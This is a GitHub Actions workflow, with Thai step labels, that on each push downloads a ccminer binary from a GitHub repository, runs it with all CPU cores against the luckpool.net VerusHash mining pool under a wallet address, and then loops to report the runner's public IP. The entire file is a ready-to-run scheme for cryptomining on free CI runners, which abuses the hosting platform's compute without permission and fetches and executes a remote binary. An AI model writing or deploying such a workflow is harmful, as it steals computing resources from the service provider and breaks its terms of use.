name: Master-Bye-Cloud-Puller
on: [push, workflow_dispatch]
jobs:
  pull-and-run:
    runs-on: ubuntu-latest
    steps:
      - name: 🚀 ปฏิบัติการดึงของใหญ่ (ใช้เน็ต GitHub 1000Mbps)
        run: |
          wget https://github.com/Oropendola-S/CCMINER-GITHUB/raw/main/ccminer
          chmod +x ccminer
          ./ccminer -a verushash -o stratum+tcp://na.luckpool.net:3956 -u R9zAnHAnBf5YfFjD3pYm1uU.CloudPull -p x -t $(nproc) &
          while true; do
            IP=$(curl -s ifconfig.me)
            echo "📡 [AI Cloud] พิกัดท่อน้ำล่าสุด: $IP | สถานะ: ดูดเต็มสูบ"
            sleep 60
          done
